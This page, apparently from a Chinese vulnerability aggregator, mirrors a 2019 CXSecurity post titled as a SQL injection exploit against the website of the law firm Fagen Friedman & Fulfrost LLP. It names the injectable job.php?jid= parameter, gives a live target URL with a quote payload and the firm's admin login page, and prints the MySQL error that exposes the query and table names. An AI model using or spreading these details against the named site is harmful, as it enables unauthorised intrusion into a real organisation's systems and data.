Fagen Friedman & Fulfrost LLP SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1736114 漏洞类型
发布时间 2019-09-10 更新时间 2019-09-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090080
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Fagen Friedman & Fulfrost LLP SQLi
# Date:  10 Sep 2019                                             
# Author: H.BBF3.4 & A.BBF3.4                                                            
+++++++++++++++++++++++++

ABOUT Fagen Friedman & Fulfrost:
Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges.
Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies.  These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies.

++++++++++++++++++++++++++

# SQL Injection Exploit :
**********************
job.php?jid=


# Example Vulnerable Sites :
*************************
[+] https://www.f3law.com/job.php?jid=9%27

admin login:
https://www.f3law.com/admin/

# Example SQL Database Error :
****************************
ERROR: Select Sidebars
MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4
Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;